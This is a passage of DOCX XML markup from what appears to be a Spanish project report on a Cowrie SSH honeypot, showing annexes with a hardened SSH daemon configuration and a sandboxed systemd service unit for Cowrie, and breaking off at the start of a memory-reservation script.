      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Port 2022</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Solo claves publicas, nunca contrasenas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">PubkeyAuthentication yes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">PasswordAuthentication no</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">KbdInteractiveAuthentication no</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">AuthenticationMethods publickey</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Sin root y solo el usuario administrador (lo sustituye el script)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">PermitRootLogin no</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">AllowUsers __ADMIN_USER__</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Limitar intentos y tiempo de login</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">MaxAuthTries 3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">LoginGraceTime 30</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Funciones innecesarias desactivadas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">X11Forwarding no</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="200" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">AllowAgentForwarding no</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pageBreakBefore/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Anexo D. Servicio de systemd de Cowrie</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Fichero /etc/systemd/system/cowrie.service.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="12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/etc/systemd/system/cowrie.service - Honeypot Cowrie (PFC-Cowrie)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#  Arranca Cowrie en primer plano bajo systemd, como usuario sin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#  privilegios y con el sistema de ficheros en solo lectura salvo var/.</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[Unit]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Description=Cowrie SSH honeypot (PFC-Cowrie)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">After=network-online.target</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Wants=network-online.target</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[Service]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Type=simple</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">User=cowrie</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Group=cowrie</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">WorkingDirectory=/home/cowrie/honeypot</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Se lanza twistd directamente y en primer plano (-n), con la salida al</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># journal (journalctl -u cowrie). Es lo que hace "cowrie start" con</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># COWRIE_STDOUT=yes, salvo dos detalles que lo rompian bajo systemd:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#  - "cowrie start" busca twistd en el PATH y systemd no activa el venv</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#    (FileNotFoundError): aqui va la ruta completa.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#  - twistd escribe twistd.pid en el directorio de trabajo, que el</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#    confinamiento deja en solo lectura: --pidfile= lo desactiva (systemd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#    ya sabe el PID del proceso).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">ExecStart=/home/cowrie/honeypot/cowrie-env/bin/twistd --umask=0022 -n --pidfile= --logger cowrie.python.logfile.stdoutLogger cowrie</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Restart=always</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">RestartSec=10</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Confinamiento: aunque alguien escapase de Cowrie, no podria escribir</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># fuera de var/ ni ganar privilegios.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">NoNewPrivileges=yes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">PrivateTmp=yes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">PrivateDevices=yes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">ProtectSystem=strict</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">ProtectHome=read-only</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">ReadWritePaths=/home/cowrie/honeypot/var</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">ProtectKernelTunables=yes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">ProtectKernelModules=yes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">ProtectControlGroups=yes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">RestrictSUIDSGID=yes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">CapabilityBoundingSet=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">MemoryMax=512M</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[Install]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="200" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">WantedBy=multi-user.target</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pageBreakBefore/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Anexo E. Reserva de Memoria (oci-keepalive)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Programa instalado en /usr/local/lib/pfc-cowrie/ y su servicio en /etc/systemd/system/.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">oci-keepalive.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="120" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
